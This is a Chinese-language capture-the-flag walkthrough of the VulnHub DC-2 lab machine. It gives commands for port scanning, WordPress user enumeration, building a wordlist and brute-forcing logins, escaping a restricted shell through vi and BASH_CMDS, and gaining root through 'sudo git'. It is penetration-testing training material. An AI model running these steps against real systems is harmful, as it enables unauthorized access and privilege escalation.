DC-2渗透记录
准备工作
在vulnhub官网下载DC:2靶机DC-2
信息收集
对靶机进行扫描
nmap -sV -A -T4 192.168.1.11
可以看到主机开放了80端口 (这里有故意小坑,需要手动配置hosts文件,靶机ip对应的dc-2域名里添加进去)
访问发现是wordPress的网站
发现 flag1
提示用cewl 生成字典
cewl http://dc-2/index.php/flag/ > pwd.txt
使用wpscan扫描
wpscan http://dc-2/ -e u 枚举用户名
发现三个用户名
扫描网站目录
dirsearch -u http://192.168.1.11/
发现admin、jerry、tom三个用户,结合我们刚刚拿到的密码字典,可以进行爆破
使用BP带的爆破模块,选择Cluster bomb模式,将用户和密码设置为变量
attack type:表示设置攻击模式,一共有四种
sniper:对单一变量进行一次破解
battering ram:对多变量同时进行破解。
pitchfork:每一个变量标记对应一个字典,取每个字典的对应项。
cluster bomb:每个变量对应一个字典,并且进行交集破解,尝试各种组合
进行爆破,根据返回的长度,获得两个匹配的账号密码
tom——parturient
jerry——adipiscing
登录发现flag
只能在进行一次全端口扫描
nmap -sV -p- 192.168.1.11
发现有ssh服务 使用刚刚的账号密码尝试登陆
ssh tom@192.168.1.11 -p 7744
查看flag3.txt
使用cat 发现无法使用
改用vi后可以打开
这里提示我们使用 su 切换到jerry
尝试后发现
绕过rbash
翻阅资料找到Rbash的绕过几种方式
因为刚刚可以vi使用编辑器查看flag
所以我们这里使用vi编辑器绕过rbash
在命令行中,输入 vi,在末行模式中,输入 :setshell=/bin/bash
然后执行shell 即可获得无限制的shell
进入jerry目录找到flag4 提示我们用git提权
vi编辑器获得的shell 无法使用su命令
换一种方式
BASH_CMDS[a]=/bin/sh;a //注:把/bin/bash给a变量`
export PATH=$PATH:/bin/ //注:将/bin 作为PATH环境变量导出
export PATH=$PATH:/usr/bin //注:将/usr/bin作为PATH环境变量导出
成功切换到jerry用户
git 提权
输入
sudo git -p --help
会强制进去交互界面,然后调用bash
!/bin/bash
成功获得root权限